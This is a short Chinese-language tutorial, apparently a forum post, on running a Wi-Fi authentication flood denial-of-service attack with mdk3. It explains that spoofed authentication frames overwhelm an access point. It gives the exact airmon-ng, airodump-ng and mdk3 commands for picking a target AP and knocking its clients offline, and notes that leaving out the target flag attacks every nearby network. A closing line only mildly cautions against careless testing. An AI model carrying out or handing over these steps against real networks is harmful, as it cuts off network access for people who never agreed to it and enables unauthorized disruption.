使用 mdk3 进行验证洪水攻击

beyes

验证供水攻击的英文为 “Authentication Flood Attack” ，简称 Auth D.O.S，属于无线拒绝服务攻击的一种。该攻击目标主要针对那些处于通过验证并和 AP 建立关联的关联客户端，当受到这种大量的攻击时，AP 将发生拒绝服务，从而导致客户端无法访问网络。

在这种攻击方式下，攻击者向 AP 发送大量的伪造身份验证请求帧（随机生成 MAC 地址伪造工作站），当 AP 受到这种大量的验证请求并疲于奔命时（AP 将连接记录记录在链表中，AP 受到猛烈的虚假请求时，将导致连接列表出现错误），AP 将断开和其他无线服务连接。

实现这种攻击的工具有很多，在 BT/Kali linux 下，比较有名的有 mdk3 ，下面介绍这种简单且凑效的攻击步骤：


先探测攻击目标：

1. airmon-ng start wlan0
   
2. airodump-ng mon0

复制代码

攻击之前，网卡必须处于监听模式。




看到许多目标，从中选择一个目标，然后执行下面命令攻击：

1. mdk3 mon0 a -c 1 -a  00-87-46-0D-DB-41

复制代码

mon0 表示监听接口。

a 表示采用 Auth D.O.S 攻击。

-c  后接工作频道。

-a 后接要攻击的 AP 地址。

注意，如果不用 -a 参数指定一个地址，那 mdk3 就会对探测到的全部无线网络进行随机攻击，够霸道。该攻击方式威力巨大，请不要胡乱测试。